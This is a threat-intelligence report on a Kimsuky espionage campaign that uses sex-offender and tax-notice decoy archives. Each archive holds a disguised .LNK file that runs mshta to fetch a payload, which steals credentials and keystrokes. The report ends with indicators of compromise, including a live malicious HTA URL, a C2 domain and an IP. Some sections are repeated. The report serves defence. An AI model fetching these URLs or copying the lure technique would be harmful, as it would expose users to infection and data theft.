Kimsuky Attack Disguised as Sex Offender Notification
Contents
1. Overview
In late July 2025, a coordinated APT campaign leveraging Windows shortcut (.LNK
) files was identified. Based on technical analysis, the attack is attributed to the Kimsuky group, a North Korean state-sponsored Advanced Persistent Threat (APT) actor primarily focused on cyber espionage and intelligence collection.
Malware Distribution and Execution Overview
The attackers deliver a crafted .LNK
shortcut file embedded in a compressed archive, which executes mshta.exe
to fetch and decrypt a remote payload. This payload collects sensitive information—including files, credentials, browser extensions, and keystrokes—from the infected system, encrypts it, and transmits it to a remote Command and Control (C2) server. The malware also supports remote command execution and additional payload delivery.
Delivery Mechanism
- The threat actors distribute compressed decoy archives such as:
성범죄자 신상정보 고지.zip
(Sex Offender Notification.zip)국세 고지서.pdf.zip
(National Tax Notice.pdf.zip)sexoffender.zip
- Upon extraction, the archive contains:
- Several password-protected decoy documents
- A disguised
.LNK
file named문서암호.txt.lnk
(DocumentPassword.txt.lnk), appearing as a harmless text file
Execution Flow Upon User Interaction
- When the user executes …
In late July 2025, a coordinated APT campaign leveraging Windows shortcut (.LNK
) files was identified. Based on technical analysis, the attack is attributed to the Kimsuky group, a North Korean state-sponsored Advanced Persistent Threat (APT) actor primarily focused on cyber espionage and intelligence collection.
Malware Distribution and Execution Overview
The attackers deliver a crafted .LNK
shortcut file embedded in a compressed archive, which executes mshta.exe
to fetch and decrypt a remote payload. This payload collects sensitive information—including files, credentials, browser extensions, and keystrokes—from the infected system, encrypts it, and transmits it to a remote Command and Control (C2) server. The malware also supports remote command execution and additional payload delivery.
Delivery Mechanism
- The threat actors distribute compressed decoy archives such as:
성범죄자 신상정보 고지.zip
(Sex Offender Notification.zip)국세 고지서.pdf.zip
(National Tax Notice.pdf.zip)sexoffender.zip
- Upon extraction, the archive contains:
- Several password-protected decoy documents
- A disguised
.LNK
file named문서암호.txt.lnk
(DocumentPassword.txt.lnk), appearing as a harmless text file
Execution Flow Upon User Interaction
- When the user executes …
IoC
https://yfews.mailhubsec.com/comm/vpwepi.hta
https://yajxu.mailhubsec.com/
142.11.248.98
acdf153ab1211ebc840a18d2ff2221fb
1a2164d9fea343bd5a5fc31a0849bb6e
373fce7c6fa68ad9afa22bcbf8c15f5d
5852e7911d0df2473d6ed34d1ce56ff7
9debce6651edac2a0e135a5b06f68a88
71a6e029ae3a56a1d5d244cdda0a93e0
425e7f14bfef366725fb806c93a0e94e
851910eb3c05738de97d66078acc32bc
baaa2dd6942f582cd7f684b5ebc447f0
e45606ec936210f3830f29d0e12108c8
444f67d186136d3deaae17a7f27b879e
677e77265c7ba52e825fc62023942213
95b0ee79eda2ea1857bda77aaaa71d92
40e117a35c579a2f17eafaa728abdee3
1230b4160b399b84453fd15ed7a6f1e0
5eb7a909d8e8e3773b2ccc780d8f765a
4593e0baa7e444537730c057b1a465f3
dcb9bcd4971167905a6924c4c2cef12e
172dc997ca6022ec8dff0842e4c7b887
17b2412c1c74db7e83482a544fefacdc
13d89e3f08197920230b521997135a6c
4aea7f8a80c27268bd68077621d69b68
5441d8a79411a261546beb1021cb5052
03794685a12ce0dd7b69e70ced8568f9
https://yajxu.mailhubsec.com/
142.11.248.98
acdf153ab1211ebc840a18d2ff2221fb
1a2164d9fea343bd5a5fc31a0849bb6e
373fce7c6fa68ad9afa22bcbf8c15f5d
5852e7911d0df2473d6ed34d1ce56ff7
9debce6651edac2a0e135a5b06f68a88
71a6e029ae3a56a1d5d244cdda0a93e0
425e7f14bfef366725fb806c93a0e94e
851910eb3c05738de97d66078acc32bc
baaa2dd6942f582cd7f684b5ebc447f0
e45606ec936210f3830f29d0e12108c8
444f67d186136d3deaae17a7f27b879e
677e77265c7ba52e825fc62023942213
95b0ee79eda2ea1857bda77aaaa71d92
40e117a35c579a2f17eafaa728abdee3
1230b4160b399b84453fd15ed7a6f1e0
5eb7a909d8e8e3773b2ccc780d8f765a
4593e0baa7e444537730c057b1a465f3
dcb9bcd4971167905a6924c4c2cef12e
172dc997ca6022ec8dff0842e4c7b887
17b2412c1c74db7e83482a544fefacdc
13d89e3f08197920230b521997135a6c
4aea7f8a80c27268bd68077621d69b68
5441d8a79411a261546beb1021cb5052
03794685a12ce0dd7b69e70ced8568f9